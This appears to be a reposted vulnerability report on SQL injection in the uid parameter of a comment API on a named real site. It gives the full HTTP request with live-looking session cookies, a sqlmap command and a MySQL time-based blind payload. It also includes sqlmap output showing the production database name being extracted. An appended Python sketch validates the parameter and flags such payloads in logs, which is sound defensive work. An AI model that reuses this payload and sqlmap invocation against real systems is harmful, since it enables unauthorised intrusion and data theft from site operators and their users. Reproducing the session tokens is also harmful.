
SQL injection in a Sina Leju API endpoint

16-04-26

Injection parameter: uid
GET /api/comment/getcomment?callback=jsonp_278cgunw7w6imyb&key=1dd7374509225e5abf1484a8d0965aef&unique_id=6129070685173370162&uid=2970574011* HTTP/1.1
Host: comment.leju.com
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Accept-Encoding: gzip, deflate, sdch
Host: comment.leju.com
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.86 Safari/537.36
Connection: keep-alive
Referer: http://hf.leju.com/news/2016-04-22/08186129070685173370162.shtml
Cookie: M_AUTH=bcf97a064686696b03c5be538b6759fe74a9086b; M_USER=eNpdj8GKAjEMhp%2BmXoQl7bRNcuhhdAoWtlWnncOcZGbcZXEfYNGn3ypeFAL%2FT%2FKFP1nF0xA6pxjBoAYpV7WRfZ%2Fa6J3wKFiLloS3gkhs8IU77PbJu2p8bMPn3eQxl1AX4QMkKcUAa6kNEUgGU%2Bchl13oOzfe%2BstYjtd4%2B0lDAR4vv9f4J5qu1gPL%2B6Hfeoeap7mZLdlGWQJr4YxoiSUa%2BUVSPdhNSJ1b9DJp1dAEM1dRcF4WAzzZbzSkeb4fF1L7%2Fmp5Bql%2F1hZEWg%3D%3D; M_KEY=YmNhNzljMjFZbW91WW1KekxtaHZkWE5sTG5OcGJtRXVZMjl0TG1OdVh6RTBOVGc0T0Rnek1EVT0yZGY4; M_INFO=%7B%22uid%22%3A%222970574011%22%2C%22username%22%3A%22%5Cu7528%5Cu62372970574011%22%2C%22isThird%22%3Atrue%2C%22phone%22%3A%22%22%2C%22headurl%22%3A%22http%3A%5C%2F%5C%2Fp4.sinaimg.cn%5C%2F2970574011%5C%2F180%22%2C%22iscard%22%3Afalse%7D; M_UID=2970574011; M_ITSOURCE=749ab3b68632680660d776891751e812; M_SPRING=YzRjYTQyMzhNUT09YjkyMw%3D%3D; M_TICKET=NGU5ZDc4Y2RZbW91WW1KekxtaHZkWE5sTG5OcGJtRXVZMjl0TG1OdVh6RTBOVGc0TURFNU1EVmZNamszTURVM05EQXhNUT09ZWE5Yw%3D%3D; pgv_pvi=1220687872; city=wh; wapparam=wap2web; citypub=wh; extern_host=hf.leju.com; gatheruuid=56f63df72a5ab810
sqlmap -r 1.txt --dbms=mysql --current-db --technique=T

---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://comment.leju.com:80/api/comment/getcomment?callback=jsonp_278cgunw7w6imyb&key=1dd7374509225e5abf1484a8d0965aef&unique_id=6129070685173370162&uid=2970574011') AND (SELECT * FROM (SELECT(SLEEP(5)))sslJ) AND ('lITm'='lITm
---
[22:49:28] [INFO] testing MySQL
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[22:49:57] [INFO] confirming MySQL
[22:49:57] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[22:50:37] [INFO] adjusting time delay to 4 seconds due to good response times
[22:50:37] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[22:50:37] [INFO] fetching current database
[22:50:37] [INFO] retrieved: comment_leju_com
current database:    'comment_leju_com'
[23:09:23] [INFO] fetched data logged to text files under '/Users/null0z/.sqlmap/output/comment.leju.com'
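
A defensive sketch for the finding above, added here as an example and not part of the original report or of Leju's code: a strict server-side check for `uid`, plus a log review that flags requests whose `uid` carries a time-delay payload like the one sqlmap reported. Assumptions: `uid` is always a plain decimal id, access logs use the common combined format, and the names `parse_uid`, `classify` and `review_log` are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: uid is always a plain decimal account id, as in uid=2970574011.
UID_RE = re.compile(r"[0-9]{1,20}")
# MySQL delay primitives used by time-based blind payloads such as the one above.
DELAY_RE = re.compile(r"\b(?:sleep|benchmark)\s*\(", re.IGNORECASE)
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[0-9.]+"')

def parse_uid(raw):
    """Handler-side check: return uid as int, or None to reject the request."""
    return int(raw) if UID_RE.fullmatch(raw) else None

def classify(target):
    """Label one request target: 'ok', 'invalid-uid' or 'time-based-sqli'."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for raw in query.get("uid", []):      # parse_qs URL-decodes each value
        if parse_uid(raw) is None:
            return "time-based-sqli" if DELAY_RE.search(raw) else "invalid-uid"
    return "ok"

def review_log(lines):
    """Return (client, verdict) for every logged request whose uid is rejected."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if match and (verdict := classify(match.group(1))) != "ok":
            findings.append((line.split()[0], verdict))
    return findings

# Constructed access-log lines (documentation IPs); the second carries the
# payload shape reported by sqlmap above, URL-encoded as a client would send it.
SAMPLE_LOG = [
    '198.51.100.7 - - [26/Apr/2016:22:40:01 +0800] "GET /api/comment/getcomment?unique_id=1&uid=2970574011 HTTP/1.1" 200 512',
    '203.0.113.9 - - [26/Apr/2016:22:49:28 +0800] "GET /api/comment/getcomment?unique_id=1&uid=2970574011%27)%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))sslJ)%20AND%20(%27lITm%27=%27lITm HTTP/1.1" 200 512',
    '203.0.113.9 - - [26/Apr/2016:22:49:30 +0800] "GET /api/comment/getcomment?unique_id=1&uid=2970574011%27 HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for client, verdict in review_log(SAMPLE_LOG):
        print(client, verdict)
```

Validation only narrows the input; the query behind the endpoint should still bind `uid` as a parameter instead of concatenating it into the SQL string.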
 


Copyright: 红黑联盟, dedicated to being a practical IT technology learning site